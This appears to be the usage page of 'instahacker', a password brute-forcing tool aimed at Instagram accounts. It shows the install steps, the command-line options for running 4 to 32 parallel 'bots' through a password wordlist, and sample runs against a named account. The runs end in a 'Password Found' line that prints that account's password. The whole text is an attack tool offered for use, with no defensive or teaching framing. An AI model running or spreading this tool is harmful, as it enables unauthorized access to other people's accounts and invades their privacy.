git clone
cd instahacker
pip3 install -r requirements.txt
C:\Users\Moussa\Desktop\Instagram>python3 -h usage: [-h] [-m MODE] username wordlist
positional arguments: username email or username wordlist password list
optional arguments: -h, --help show this help message and exit -m MODE, --mode MODE modes: 0 => 32 bots; 1 => 16 bots; 2 => 8 bots; 3 => 4 bots
python3 -m
4 bots: 64 passwords at a time
8 bots: 128 passwords at a time
16 bots: 256 passwords at a time
32 bots: 512 passwords at a time
0: 32 bots
1: 16 bots
2: 8 bots
3: 4 bots
This mode uses only 4 bots, or 64 passwords at a time.
C:\Users\Moussa\Desktop\Instagram>python3 Sami09.1 pass.lst -m 3
This mode uses 8 bots, or 128 passwords at a time.
C:\Users\Moussa\Desktop\Instagram>python3 Sami09.1 pass.lst -m 2
This mode uses 16 bots, or 256 passwords at a time.
C:\Users\Moussa\Desktop\Instagram>python3 Sami09.1 pass.lst -m 1
This mode uses 32 bots, or 512 passwords at a time.
C:\Users\Moussa\Desktop\Instagram>python3 Sami09.1 pass.lst -m 0
If you don't specify a mode, then mode is set to 2
[-] Wordlist: pass.lst
[-] Username: Sami09.1
[-] Password: 272
[-] Complete: 45.51%
[-] Attempts: 228
[-] Browsers: 273
[-] Exists: True
[-] Wordlist: pass.lst
[-] Username: Sami09.1
[-] Password: Sami123
[-] Complete: 62.67%
[-] Attempts: 314
[-] Browsers: 185
[-] Exists: True
[!] Password Found
[+] Username: Sami09.1
[+] Password: Sami123